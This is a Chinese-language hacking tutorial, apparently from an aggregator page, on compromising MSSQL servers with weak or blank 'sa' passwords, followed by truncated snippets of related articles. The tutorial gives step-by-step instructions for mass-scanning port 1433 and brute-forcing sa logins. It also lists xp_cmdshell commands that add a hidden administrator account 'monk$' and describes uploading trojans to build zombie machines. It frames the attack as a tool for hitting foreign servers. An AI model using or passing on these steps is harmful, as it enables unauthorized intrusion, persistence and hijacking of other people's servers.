sql弱口令入侵
mssql伺服器sa使用者弱口令入侵是及其經典的一種黑客入侵手法 。
其成名是在中美黑客大戰的時候,我們的前輩利用它入侵了很多美國鬼
子的伺服器。下面我介紹一下這種入侵的詳細情況。
基礎知識:
我們在安裝mssql伺服器之後,系統會有個預設的帳號sa
,而這個帳號預設又是空密碼。最要命的是這個sa級別的使用者幾乎等
同於系統使用者中的administrators,而且mssql有
個xp_cmdshell擴充套件儲存功能,這玩意使得我們通過mss
ql合法的語句就可以呼叫cmd來執行dos命令。於是災難來了。
入侵:
工具:s(快速掃瞄埠工具,命令列下的),xsacn
(安焦出品的伺服器掃瞄軟體),sqltools
(sql綜合利用工具),木馬或者後門乙個
眾所周知,mssql伺服器的特徵埠是1433
(我見過bt的網管改過它的預設埠,但大部分管管還是正常人
,嘻嘻)
於是第一步:
用s大面積掃瞄開放1433埠的活動主機。
(在安裝xp sp2之後,s之類的併發執行緒很大的掃瞄工具不能正常使用
,可以在其他作業系統環境下掃瞄,或者用肉雞掃)
第二步:
把掃瞄結果儲存為文字,並處理成一行乙個ip的格式
第三步:
使用xsacn,載入掃瞄主機列表檔案(就是第二步儲存的文字)
,配置好字典(xscan自帶有一套),在掃瞄選項裡只勾選sql
弱口令,開始掃瞄。
(大面積掃瞄不建議掛載十分複雜的字典,注意這是弱口令
,所以使用常規字典就可以,加快速度)
第四步:
喝杯茶,看會電視,唱唱歌,去溜達一圈。等著掃瞄報告吧。
xsacn掃瞄完成後會自動生成掃瞄報告,裡面有詳細結果。
第五步:
利用sql綜合利用工具連線上面得到的弱口令主機
。先看看能不能使用dos命令
以下是一部分常用的命令
dir c:/ //瀏覽c盤
type c:/boot.ini //顯示boot.ini的內容,用於檢視作業系統型別與版本
ver //功能同上
net start //檢視系統啟動的服務
netstat -na //檢視埠開發情況
net user //檢視當前系統使用者情況
net user monk$ monk /add //新增乙個名為monk$密碼為monk的使用者
net localgroup administrators monk$ /add //將monk$使用者加入管理組
為什麼要建立monk$這樣乙個使用者呢?因為使用者名稱後面帶 $符號後,管理員使用:net user 看不到,但缺點就是在管理面板中可以看到。(強一點的隱藏方法是帳
號轉殖,這裡就不說了)
如果我們發現伺服器的 終端服務:terminal service是開放的,對方又是2000或者2003伺服器
,那麼我們可以直接新增使用者,遠端登陸。
如果沒有終端,或者終端不開放。那我們可以使用上傳功能
,把我們的後門或者木馬上傳上去,執行。
這樣就簡單得拿到一台肉雞了。
sa弱口令強行入侵
我自己現在找肉雞主要是找sa弱口令肉雞到還能找到幾隻,但也碰到不少困難,到處查資料總算找到點有用的。下面這些命令要sql分離器才能實現,下面是一些關於sa弱口令相關命令。一.更改sa口令方法 二.簡單修補sa弱口令 方法1 查詢分離器連線後執行 if exists select from dbo.s...
入侵感知系列之弱口令檢測思路
弱口令檢測 背景 在安全方面弱口令問題算是技術含量最低的安全隱患了。但往往技術含量越低,被利用頻率也越高,而且造成的影響還不見得小。所以治理弱口令將成為安全體系建設中價效比最高的乙個環節。但是就是這樣乙個價效比高的環節想完全杜絕卻不是那麼容易,未來的系統可以通過註冊申請環節強制設定強密碼,但是針對過...
弱口令總結(什麼是弱口令)
空口令 口令長度小於8 口令不應該為連續的某個字元 qqqqqq 賬號密碼相同 例 root root 口令與賬號相反 例 root toor 口令純數字 例 112312324234,號 口令純字母 例 asdjfhask 口令已數字代替字母 例 hello word,hell0 w0rd 口令採...